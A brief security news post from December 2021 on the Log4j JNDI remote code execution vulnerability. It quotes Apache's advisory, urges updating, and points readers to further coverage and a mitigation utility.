The Log4j mess
The Log4j mess
[Security] Posted Dec 12, 2021 16:29 UTC (Sun) by corbet
For those who have not yet seen it, this advisory from Apache describes a nasty vulnerability in the widely used Log4j package.
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
Updating this package is, of course, necessary, but that will only help so much; it is bundled into a lot of other deployed products. For more information see this Ars Technica article or, for desperate cases, the Logout4Shell utility.